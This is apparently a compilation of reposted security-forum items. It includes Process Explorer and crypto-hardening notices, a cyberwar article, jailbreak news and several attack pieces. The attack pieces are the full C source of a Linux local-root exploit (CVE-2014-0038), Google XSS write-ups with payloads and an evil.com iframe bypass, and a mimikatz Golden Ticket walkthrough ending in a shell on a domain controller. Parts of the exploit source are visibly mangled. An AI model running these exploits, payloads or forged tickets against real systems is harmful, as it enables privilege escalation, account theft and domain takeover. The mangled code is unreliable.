to broadcast addresses. Sursa: https://github.com/DanMcInerney/wifijammer
-
Process Explorer v16.0 By Mark Russinovich Published: January 29, 2014 Download Process Explorer (1,215 KB) [TABLE=class: tableCss] [TR] [TD=class: tableCellRateControlCss][/TD] [/TR] [/TABLE] Introduction Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded. The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded. Process Explorer also has a powerful search capability that will quickly show you which processes have particular handles opened or DLLs loaded. The unique capabilities of Process Explorer make it useful for tracking down DLL-version problems or handle leaks, and provide insight into the way Windows and applications work. Download Download Process Explorer (1,215 KB) Run Process Explorer now from Live.Sysinternals.com Sursa: Process Explorer
-
iPhone 4s, iPad 2 / 3, iPad mini, iPod touch 5 Jailbroken For Life! By Ben Reid | February 2nd, 2014 Advertisements iOS hacker iH8sn0w has discovered a way to untether jailbreak devices powered by the Apple A5(X) processor for life, which includes the iPhone 4s, iPod touch 5, the iPad 2 / 3 and iPad mini. Details are relatively scarce at this moment regarding the iBoot exploit, although if the exploits were ever bound together and released in the form of a jailbreak utility, those in ownership of either device would be able to enjoy an potentially indefinite, untethered jailbreak. Even though the jailbreak scene is very much a here-and-now kind of pastime in that most enthusiasts are keen to find way to breach the latest versions, it’s always nice to see progress of any kind. And by the sounds of things, this is a pretty significant inroad. Taking to his Twitter feed, iH8sn0w posted A5 AES keys: So looks like all my A5(X) devices are fully untethered and jailbroken for life now. A5 AES Keys anyone? 4S 7.0.4 iBSS -iv 3a0fc879691a5a359973792bcd367277 -k 371e3aea9121d90b8106228bf2b5ee4c638a0b4837fefbd87a3c0aca646e5996 All A5(X) AES Keys will be posted on @icj_’s icj.me/ios/keys as soon as I clean this up a bit more Then, in speaking to fellow hacker Winocm, one of the guys behind p0sixspwn, iH8sn0w offered something of an insight into how exactly he managed to work the magic: This isn’t a bootrom exploit. Still a very powerful iBoot exploit though (when exploited properly ;P /cc @winocm). One follower also noted that iBoot jailbreaks can be patched by Apple on the fly. iH8sn0w responded to this by noting that they can be patched provided that they are released publicly. Also, to further add fuel to this argument, Saurik took to a thread on Reddit to shed some light on the situation: For informational purposes (as many people reading might not appreciate the difference), to get the encryption keys you only need an "iBoot exploit", not a "bootrom exploit". It is easier to find iBoot exploits (being later in the boot sequence, it has a larger attack surface: it has to be able to parse filesystems, for example), and they do afford more power over the device than an untethered userland exploit (in addition to letting you derive firmware encryption keys, you can boot custom kernels, and you might be able to dump the bootrom itself), but they are software updatable as part of new firmware releases from Apple and may have "insane setup requirements" (like, you might pretty much need an already-jailbroken device to actually setup the exploit). You thereby wouldn’t see an iBoot exploit used for a jailbreak (unless everyone is out of ideas for a very long time): instead, you’d see it hoarded away as a "secret weapon" used by jailbreakers to derive these encryption keys, making it easier to find and implement exploits on newer firmware updates for the same device (especially kernel exploits, where even if you have an arbitrary write vulnerability you are "flying blind" and thinking "ok, now where should I write? I can’t see anything… :’("). But the big question is: will the exploit ever go public? Sadly, it won’t, according to a tweet by Winocm. There’s no doubt that this is very exciting news, and we’ll be keeping a close eye on what remains a developing sequence of events, so stay tuned! You can follow us on Twitter, add us to your circle on Google+ or like our Facebook page to keep yourself updated on all the latest from Microsoft, Google, Apple and the Web. Sursa: iPhone 4s, iPad 2 / 3, iPad mini, iPod touch 5 Jailbroken For Life! | Redmond Pie
-
Two stories about XSS on Google Story 1. The Little Content Type that Could The vulnerability was found in Feedburner. First, I created a feed and tried to inject malicious data. No success there. Injected data just wouldn’t show up, only harmless links were presented. I took a few more attempts and then I found lots of messages from PodMedic. PodMedic examines links in every feed. If it finds troubles in creating a feed, it reports the cause of such troubles. The messages read that links are incorrect because the content type returned was a text type. Hmm. Ok. I bet the content type on this page isn't filtered. A simple script for my server: <?php header('Content-Type: text/<img src=z onerror=alert(document.domain)>; charset=UTF-8'); ?> And here it is: Story 2. The Little Callback that Could The Feedburner vulnerability was not satisfying. It was quite simple, actually. So I decided to try something else. APIs Explorer on developers.google.com caught my attention after some searching. Google’s APIs Explorer is a tool that helps you to explore various Google APIs interactively. Google also says that with the APIs Explorer, we can browse quickly through available APIs and versions, see methods available for each API and what parameters they support along with inline documentation and blah blah blah. In fact I was interested in cross-domain messaging based on postMessage. A link to the Google API that we are testing can be given in the Base parameter: https://developers.google.com/apis-explorer/?base=https://webapis-discovery.appspot.com/_ah/api#p/ The Base parameter is filtered by certain regular expressions (not quite accurately though) but it is easy to bypass them using a %23 symbol: https://developers.google.com/apis-explorer/?base=https://evil.com%23webapis-discovery.appspot.com/_ah/api#p/admin/reports_v1/ As a result, an iframe with src=evil.com is created and now we’re waiting for messages from it. Every message should have two tokens. First token is in window.name of the iframe, second is given in location.hash. I sniffed messages from https://webapis-discovery.appspot.com/_ah/api and wrote a page that would send the same messages with valid tokens. It worked nice, and I tried to inject some HTML data. No success though. I could change text, image locations but it would not be enough for XSS. There was a documentation link, the location of which could be changed. So I changed it to javascript:alert(document.domain) and it worked perfect. Still not enough. It required user interaction, but I really don't like it. Users never do what you want them to do (click that wrong link, for instance So I found a page on developers.google.com with the callback function (almost all developers think that callbacks are secure). I added redirection to this page with the callback ‘parent.document.links[0].click’ to my exploit after creating the documentation link via postMessage. (Symbols [ and ] were filtered, so actually the callback was as follows: document.body.lastElementChild.previousSibling.lastElementChild.firstElementChild.firstElementChild.lastElementChild.firstElementChild.firstElementChild.firstElementChild.nextSibling). Let’s try it: Done! Works fine and no need for user interaction. The exploit was as follows: token_1 = location.hash.split('rpctoken=')[1]; token_2 = window.name; send_payload(data,token_1,token_2); window.setTimeout('document.location=callback_url;',3000); // Paused because of slow internet connection… And of course I made a cool screenshot I liked that method of exploiting and tried to use it in other services. I used it to steal an OAuth token and to buy any app at Google Play using users’ payment details. Besides, the app could automatically be installed on user’s android device. The Google Security Team also liked that technique and they described it on OWASP AppSec Eu as Reverse Clickjacking. ?????: Paul Axe ?? 6:03 Sursa: @Paul_Axe : Two stories about XSS on Google
-
recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y) Detalii: http://seclists.org/oss-sec/2014/q1/187 /* *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y) CVE-2014-0038 / x32 ABI with recvmmsg by rebel @ irc.smashthestack.org ----------------------------------- takes about 13 minutes to run because timeout->tv_sec is decremented once per second and 0xff*3 is 765. some things you could do while waiting: * watch 3 times * read https://wiki.ubuntu.com/Security/Features and smirk a few times * brew some coffee * stare at the countdown giggly with anticipation could probably whack the high bits of some pointer with nanoseconds, but that would require a bunch of nulls before the pointer and then reading an oops from dmesg which isn't that elegant. &net_sysctl_root.permissions is nice because it has 16 trailing nullbytes hardcoded offsets because I only saw this on ubuntu & kallsyms is protected anyway.. same principle will work on 32bit but I didn't really find any major distros shipping with CONFIG_X86_X32=y user@ubuntu:~$ uname -a Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux user@ubuntu:~$ gcc recvmmsg.c -o recvmmsg user@ubuntu:~$ ./recvmmsg byte 3 / 3.. ~0 secs left. w00p w00p! # id uid=0(root) gid=0(root) groups=0(root) # sh phalanx-2.6b-x86_64.sh unpacking.. = greets to my homeboys kaliman, beist, capsl & all of #social Sat Feb 1 22:15:19 CET 2014 % rebel % *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* */ #define _GNU_SOURCE #include <netinet/ip.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <unistd.h> #include <sys/syscall.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <sys/utsname.h> #define __X32_SYSCALL_BIT 0x40000000 #undef __NR_recvmmsg #define __NR_recvmmsg (__X32_SYSCALL_BIT + 537) #define VLEN 1 #define BUFSIZE 200 int port; struct offset { char *kernel_version; unsigned long dest; // net_sysctl_root + 96 unsigned long original_value; // net_ctl_permissions unsigned long prepare_kernel_cred; unsigned long commit_creds; }; struct offset offsets[] = { {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10 {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10 {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04 {NULL,0,0,0,0} }; void udp(int { int sockfd; struct sockaddr_in servaddr,cliaddr; int s = 0xff+1; if(fork() == 0) { while(s > 0) { fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s)); sleep(1); s--; fprintf(stderr,"."); } sockfd = socket(AF_INET,SOCK_DGRAM,0); bzero(&servaddr,sizeof(servaddr)); servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK); servaddr.sin_port=htons(port); sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr)); exit(0); } } void trigger() { open("/proc/sys/net/core/somaxconn",O_RDONLY); if(getuid() != 0) { fprintf(stderr,"not root, ya blew it!\n"); exit(-1); } fprintf(stderr,"w00p w00p!\n"); system("/bin/sh -i"); } typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; // thx bliss static int __attribute__((regparm(3))) getroot(void *head, void * table) { commit_creds(prepare_kernel_cred(0)); return -1; } void __attribute__((regparm(3))) trampoline() { asm("mov $getroot, %rax; call *%rax;"); } int main(void) { int sockfd, retval, i; struct sockaddr_in sa; struct mmsghdr msgs[VLEN]; struct iovec iovecs[VLEN]; char buf[bUFSIZE]; long mmapped; struct utsname u; struct offset *off = NULL; uname(&u); for(i=0;offsets.kernel_version != NULL;i++) { if(!strcmp(offsets.kernel_version,u.release)) { off = &offsets; break; } } if(!off) { fprintf(stderr,"no offsets for this kernel version..\n"); exit(-1); } mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1)); mmapped &= 0x000000ffffffffff; srand(time(NULL)); port = (rand() % 30000)+1500; commit_creds = (_commit_creds)off->commit_creds; prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred; mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); if(mmapped == -1) { perror("mmap()"); exit(-1); } memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3); memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300); if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) { perror("mprotect()"); exit(-1); } sockfd = socket(AF_INET, SOCK_DGRAM, 0); if (sockfd == -1) { perror("socket()"); exit(-1); } sa.sin_family = AF_INET; sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK); sa.sin_port = htons(port); if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) { perror("bind()"); exit(-1); } memset(msgs, 0, sizeof(msgs)); iovecs[0].iov_base = &buf; iovecs[0].iov_len = BUFSIZE; msgs[0].msg_hdr.msg_iov = &iovecs[0]; msgs[0].msg_hdr.msg_iovlen = 1; for(i=0;i < 3 ;i++) { udp(i); retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i); if(!retval) { fprintf(stderr,"\nrecvmmsg() failed\n"); } } close(sockfd); fprintf(stderr,"\n"); trigger(); } Sursa: [C] recvmmsg.c - Pastebin.com
-
If This Is Cyberwar, Where Are All the Cyberweapons? The discovery of Stuxnet in 2010 seemed to herald a new age of cyberwar, but that age has yet to materialize. By Paul F. Roberts on January 27, 2014 Like the atomic bomb in the waning days of World War II, the computer virus known as Stuxnet, discovered in 2010, seemed to usher in a new era of warfare. In the era of cyberwar, experts warned, silent, software-based attacks will take the place of explosive ordinance, tanks, and machine guns, or at least set the stage for them. Or maybe not. Almost four years after it was first publicly identified, Stuxnet is an anomaly: the first and only cyberweapon ever known to have been deployed. Now some experts in cybersecurity and critical infrastructure want to know why. Are there fewer realistic targets than suspected? Are such weapons more difficult to construct than realized? Or is the current generation of cyberweapons simply too well hid? Such questions were on the minds of the world’s top experts in the security of industrial control systems last week at the annual S4 conference outside Miami. S4 gathers the world’s top experts on the security of nuclear reactors, power grids, and assembly lines. At S4 there was broad agreement that—long after Stuxnet’s name has faded from the headlines—industrial control systems like the Siemens Programmable Logic Controllers are still vulnerable. Eireann Leverett, a security researcher at the firm IOActive, told attendees at the conference that commonplace security practices in the world of enterprise information technology are still uncommon among vendors who develop industrial control systems (see “Protecting Power Grids from Hackers Is a Huge Challenge”). Leverett noted that modern industrial control systems, which sell for thousands of dollars per unit, often ship with software that lacks basic security controls like user authentication, code signing to prevent unauthorized software updates, or event logging to allow customers to track changes to the device. It is also clear that, in the years since Stuxnet came to light, developed and developing nations alike have seized on cyber operations as a fruitful new avenue for research and development (see “Welcome to the Malware Industrial Complex”). Laura Galante, a former U.S. Department of Defense intelligence analyst who now works for the firm Mandiant, said that the U.S. isn’t just tracking the activities of nations like Russia and China, but also Syria and Stuxnet’s target of choice: Iran. Galante said cyberweapons give smaller, poorer nations a way to leverage asymmetric force against much larger foes. Even so, truly effective cyberweapons require extraordinary expertise. Ralph Langner, perhaps the world’s top authority on the Stuxnet worm, argues that the mere hacking of critical systems doesn’t count as cyberwarfare. For example, Stuxnet made headlines for using four exploits for “zero day” (or previously undiscovered) holes in the Windows operating system. But Langner said the metallurgic expertise needed to understand the construction of Iran’s centrifuges was far more impressive. Those who created Stuxnet needed to know the exact amount of pressure or torque needed to damage aluminum rotors within them, sabotaging the country’s uranium enrichment operation. Concentrating on software-based tools that can cause physical harm sets a much higher bar for discussions of cyberweapons, Langner argues. By that standard, Stuxnet was a true cyberweapon, but the 2012 Shamoon attack against the oil giant Saudi Aramco and other oil companies was not, even though it erased the hard drives of the computers it infected. Some argue that the conditions for using such a destructive cyberweapon simply haven’t arisen again—and aren’t likely to for a while. Operations like Stuxnet—stealth projects designed to slowly degrade Iran’s enrichment capability over years—are the exception rather than the rule, said Thomas Rid of the Department of War Studies at Kings College in London. “There are not too many targets that would lend themselves to a covert campaign as Stuxnet did,” Rid said. Rid told attendees that the quality of the intelligence gathered on a particular target makes the difference between an effective cyberweapon and a flop. It’s also possible that other cyberweapons have been used, but the circumstances surrounding their use are a secret, locked up by governments as “classified” information, or protected by strict nondisclosure agreements. Indeed, Langner, who works with some of the world’s leading industrial firms and governments, said he knows of one other true physical cyberattack, this one tied to a criminal group. But he wouldn’t talk about it. Industrial control professionals and academics complain that the information needed to research future attacks are being kept out of the public domain. And public utilities, industrial firms, and owners of critical infrastructure are just now becoming aware that systems they assumed were cordoned off from the public Internet very often are not. Meanwhile, technology is driving even more rapid and transformative changes as part of what’s called the Internet of things. Ubiquitous Internet connectivity combined with inexpensive and tiny computers and sensors will soon allow autonomous systems to communicate directly with each other (see “Securing the Smart Home, from Toasters to Toilets”). Without proper security features built into industrial products from the get-go, the potential for attacks and physical harm increase dramatically. “If we continue to ignore the problem, we are going to be in deep trouble,” Langner said. Sursa: Where Are All the Cyberweapons? | MIT Technology Review
-
[h=1]mimikatz - Golden Ticket[/h] [h=2]Introduction[/h] We have a new feature again in mimikatz called Golden Ticket provided by Benjamin Delpy aka gentilkiwi. With this technique, we can basically access any resource in the domain. Here is the list of what you need to make it work: krbtgt user's NTLM hash (e.g. from a previous NTDS.DIT dump) Username that we'd like to impersonate As you can see, exploiting this architectural flaw is not trivial, because we need the NTLM hash of the krbtgt user and that requires hacking a Domain Controller first. But once that is done we can play with it for some time, because the hash of the krbtgt user will not change for a while. As you know mimikatz can dump and replay the existing tickets on Windows, so when we got access to a server or workstation and dumped the tickets we can easily replay those on another computer and get access to the same resource. See Google for more info. Domain name Domain's SID [h=2]Attack[/h] When we have everything from the list above, we can create a new TGT ticket with mimikatz and grant access to anything in the domain. Let's see an example: First we look for a domain administrator: Domain name Domain's SID C:\Users\evilhacker>net group "domain admins" /domain The request will be processed at a domain controller for domain ctu.domain. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- Administrator schema.Admin Jack.Bauer Administrator is good for us, so we create a TGT ticket with the Kerberos user's hashed password and make it look like as if Administrator asked for an access to a share. Now let's get the Domain SID. Easiest way to do that is just use: "whoami /user" and remove the last part of the SID, or if we have PsTools then PsGetsid.exe come in handy: C:\Users\evilhacker\Documents\mimikatz>PsGetsid.exe CTU.DOMAIN PsGetSid v1.44 - Translates SIDs to names and vice versa Copyright (C) 1999-2008 Mark Russinovich Sysinternals - www.sysinternals.com SID for CTU.DOMAIN\CTU.DOMAIN: S-1-1-12-123456789-1234567890-123456789 Now we have everything to start the attack. First we list the existing Kerberos tickets, if there is any we can those with the purge command (but it is not necessary) and then we can create the Golden Ticket and pass that. C:\Users\evilhacker\Documents\mimikatz>mimikatz.exe .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Jan 21 2014 15:06:17) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 14 modules * * */ mimikatz # kerberos::list [00000000] - 17 Start/End/MaxRenew: 1/24/2014 12:46:49 PM ; 1/24/2014 9:23:28 PM ; 1/31/2014 11:23:28 AM Server Name : krbtgt/CTU.DOMAIN @ CTU.DOMAIN Client Name : evilhacker @ CTU.DOMAIN Flags 60a00000 : pre_authent ; renewable ; forwarded ; forwardable ; ... mimikatz # kerberos::purge Ticket(s) purge for current session is OK mimikatz # kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999 /ticket:Administrator.kiribi Admin : Administrator Domain : CTU.DOMAIN SID : S-1-1-12-123456789-1234567890-123456789 krbtgt : deadbeefboobbabe003133700009999 Ticket : Administrator.kiribi * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Final Ticket Saved to file ! mimikatz # kerberos::ptt Administrator.kiribi Ticket 'Administrator.kiribi' successfully submitted for current session mimikatz # kerberos::list [00000000] - 17 Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1/24/2034 12:52:13 PM Server Name : krbtgt/CTU.DOMAIN @ CTU.DOMAIN Client Name : Administrator @ CTU.DOMAIN Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ; mimikatz # kerberos::tgt Keberos TGT of current session : Start/End/MaxRenew: 1/24/2014 12:52:13 PM ; 1/24/2024 12:52:13 PM ; 1 /24/2034 12:52:13 PM Service Name (02) : krbtgt ; CTU.DOMAIN; @ CTU.DOMAIN Target Name (--) : @ CTU.DOMAIN Client Name (01) : Administrator ; @ CTU.DOMAIN Flags 40e00000 : pre_authent ; initial ; renewable ; forwardable ; Session Key (17) : 5b 1a f2 fb f2 4d 2c 70 9c 3f 36 80 82 0c 23 37 Ticket (00 - 17) : [...] (NULL session key means allowtgtsessionkey is not set to 1) Now you can mount any share or use any RPC related tool that you like. C:\Users\evilhacker\Documents\mimikatz>net use i: \\dc01.ctu.domain\c$ The command completed successfully. C:\Users\evilhacker\Documents\mimikatz>net use New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- OK I: \\dc01.ctu.domain\c$ Microsoft Windows Network The command completed successfully. OR C:\Users\evilhacker\Documents\pstools>PsExec.exe \\dc01.ctu.domain\ cmd.exe PsExec v2.0 - Execute processes remotely Copyright (C) 2001-2013 Mark Russinovich Sysinternals - www.sysinternals.com Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>hostname DC01 C:\Windows\system32>exit cmd.exe exited on dc01.ctu.domain\ with error code 0. Some additional notes: Mimikatz does not require SE_DEBUG or other privilege to create and pass TGT [h=2]Mitigation[/h] I am not aware of any good mitigation for this. Please let me know if you do. [h=2]Greetings[/h] Thanks to Kristof Feiszt for support, Benjamin `gentilkiwi` Delpy for mimikatz [h=2]Author[/h] Balazs Bucsay - mimikatz[!at!]rycon[!dot!]hu - rycon.hu - 2014. 01. 24. Sursa: rycon.hu - mimikatz's Golden Ticket
-
Applied Crypto Hardening Wolfgang Breyha, David Durvaux, Tobias Dussa, L. Aaron Kaplan, Florian Mendel, Christian Mock, Manuel Koschuch, Adi Kriegisch, Ulrich Pöschl, Ramin Sabet, Berg San, Ralf Schlatterbeck, Thomas Schreck, Aaron Zauner, Pepi Zawodsky (University of Vienna, CERT.be, KIT-CERT, CERT.at, A-SIT/IAIK, coretec.at, FH Campus Wien, VRVis, MilCERT Austria, A-Trust, Runtux.com, Friedrich-Alexander University Erlangen-Nuremberg, azet.org, maclemon.at) Contents 1. Introduction 7 1.1. Audience . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 1.2. Related publications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 1.3. How to read this guide . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 1.4. Disclaimer and scope . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 1.5. Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10 2. Practical recommendations 11 2.1. Webservers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 2.1.1. Apache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 2.1.2. lighttpd . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 2.1.3. nginx . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 2.1.4. MS IIS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 2.2. SSH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 2.2.1. OpenSSH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17 2.2.2. Cisco ASA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 2.2.3. Cisco IOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 2.3. Mail Servers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 2.3.1. SMTP in general . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 2.3.2. Dovecot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 2.3.3. cyrus-imapd . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 2.3.4. Postfix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 2.3.5. Exim (based on 4.82) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26 2.4. VPNs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30 2.4.1. IPsec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30 2.4.2. Check Point FireWall-1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32 2.4.3. OpenVPN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34 2.4.4. PPTP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37 2.4.5. Cisco ASA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37 2.4.6. Openswan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40 2.5. PGP/GPG - Pretty Good Privacy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42 2.6. IPMI, ILO and other lights out management solutions . . . . . . . . . . . . . . . . . . . 43 2.7. Instant Messaging Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43 2.7.1. General server configuration recommendations . . . . . . . . . . . . . . . . . . 43 2.7.2. ejabberd . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43 2.7.3. Chat privacy - Off-the-Record Messaging (OTR) . . . . . . . . . . . . . . . . . . 45 2.7.4. Charybdis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45 2.7.5. SILC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 2.8. Database Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 2.8.1. Oracle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 2.8.2. MySQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46 2.8.3. DB2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47 2.8.4. PostgreSQL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 5 Draft revision: d6ea268 (2014-01-29 21:09:52 +0100) Pepi Zawodsky Draft revision: d6ea268 (2014-01-29 21:09:52 +0100) Pepi Zawodsky 2.9. Intercepting proxy solutions and reverse proxies . . . . . . . . . . . . . . . . . . . . . 49 2.9.1. squid . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50 2.9.2. Pound . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52 3. Theory 54 3.1. Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54 3.2. Cipher suites . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54 3.2.1. Architectural overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55 3.2.2. Forward Secrecy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56 3.2.3. Recommended cipher suites . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56 3.2.4. Compatibility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59 3.2.5. Choosing your own cipher suites . . . . . . . . . . . . . . . . . . . . . . . . . . . 59 3.3. Random Number Generators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61 3.3.1. When random number generators fail . . . . . . . . . . . . . . . . . . . . . . . 62 3.3.2. Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62 3.3.3. Recommendations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 3.4. Keylengths . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63 3.5. A note on Elliptic Curve Cryptography . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 3.6. A note on SHA-1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 3.7. A note on Diffie Hellman Key Exchanges . . . . . . . . . . . . . . . . . . . . . . . . . . 66 3.8. Public Key Infrastructures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66 3.8.1. Certificate Authorities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67 3.8.2. Hardening PKI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 69 A. Tools 70 A.1. SSL & TLS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70 A.2. Key length . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71 A.3. RNGs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71 A.4. Guides . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71 B. Links 72 C. Suggested Reading 73 D. Cipher Suite Name Cross-Reference 74 E. Further research 83 Download: https://bettercrypto.org/static/applied-crypto-hardening.pdf
-
[h=1]Portable Efficient Assembly Code-generator in Higher-level Python (PeachPy)[/h] PeachPy is a Python framework for writing high-performance assembly kernels. PeachPy is developed to simplify writing optimized assembly kernels while preserving all optimization opportunities of traditional assembly. Some PeachPy features: Automatic register allocation Stack frame management, including re-aligning of stack frame as needed Generating versions of a function for different calling conventions from the same source (e.g. functions for Microsoft x64 ABI and System V x86-64 ABI can be generated from the same source) Allows to define constants in the place where they are used (just like in high-level languages) Tracking of instruction extensions used in the function. Multiplexing of multiple instruction streams (helpful for software pipelining) [h=2]Installation[/h] PeachPy can be installed from PyPI pip install PeachPy from peachpy.x64 import *# Use 'x64-ms' for Microsoft x64 ABI abi = peachpy.c.ABI('x64-sysv') assembler = Assembler(abi) # Implement function void add_1(const uint32_t *src, uint32_t *dst, size_t length) src_argument = peachpy.c.Parameter("src", peachpy.c.Type("const uint32_t*")) dst_argument = peachpy.c.Parameter("dst", 